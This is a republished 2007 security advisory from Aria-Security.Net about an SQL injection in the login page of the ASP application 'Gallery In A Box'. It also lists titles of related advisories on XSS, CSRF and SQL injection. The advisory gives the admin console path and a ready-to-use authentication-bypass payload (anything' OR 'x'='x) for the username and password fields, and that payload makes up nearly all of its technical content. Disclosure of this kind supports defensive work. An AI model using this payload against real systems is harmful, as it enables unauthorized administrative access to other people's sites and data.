Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [Full-disclosure] DVD Rental System multiple XSS and CSRF vulnerabilities [Aria-Security.Net] Next Gen Portfolio Manager SQL Injection la-nai cms_v1.2.14 - Remote SQL Injection Dynamic PressRelease/getpress .asp sql injection From:Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net> Date:03.08.2007Subject:[Aria-Security.Net] Gallery In A Box Username & Password Parameters SQL Injection__________________________ A R I A - S E C U R I T Y _________________________ Gallery In A Box Username & Password Parameters SQL Injection Vendor: http://www.kerberosdev.net/ http://target.com/admin_console/index.asp Username: anything' OR 'x'='x Password: anything' OR 'x'='x Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info Greetz: AurA
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[Full-disclosure] DVD Rental System multiple XSS and CSRF vulnerabilities
[Aria-Security.Net] Next Gen Portfolio Manager SQL Injection
la-nai cms_v1.2.14 - Remote SQL Injection
Dynamic PressRelease/getpress .asp sql injection
